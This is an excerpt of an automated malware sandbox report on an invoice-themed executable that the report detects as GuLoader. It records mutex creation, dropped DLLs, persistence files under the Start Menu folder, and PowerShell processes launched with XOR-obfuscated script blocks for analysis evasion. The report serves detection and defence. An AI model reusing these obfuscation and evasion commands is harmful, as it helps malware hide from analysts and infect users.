Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10000:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10196:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9844:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10204:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9888:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8560:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9816:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8440:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: INVOICE-98656789.exe

Static file information: File size 1503236 > 1048576

Source: INVOICE-98656789.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.3247103764.0000000002F78000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 000000A7.00000002.6441525576.0000000000AE8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3245662006.0000000000849000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INVOICE-98656789.exe PID: 9744, type: MEMORYSTR

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_70351B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70351B28

Drops PE files

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\AdvSplash.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\nsExec.dll	Jump to dropped file

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Electrooculograms.Ske	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Courtman.fro	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback\Kunstgreb	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback\Kunstgreb\Vesturing.Ove	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Eksekverbare23.bad	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Kemikaliedepotet.not	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Odinic.dri	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Remarkedly.ver	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\aceituna.fin	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\aguinaldo.kon	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\anagogy.hft	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne\Cognacsglassenes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne\Cognacsglassenes\beskatningsgrundlaget.fav	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens\Enklest	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens\Enklest\Jebel235	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens\Enklest\Jebel235\corporacy.dep	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes\diskutnjr.txt	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes\ornithodelphic.sto	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Miscaller	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Miscaller\skufledes.alp	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\supersensually.kal	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\tibetansk.bud	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\zonulae.stu	Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Mass process execution to delay analysis

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}
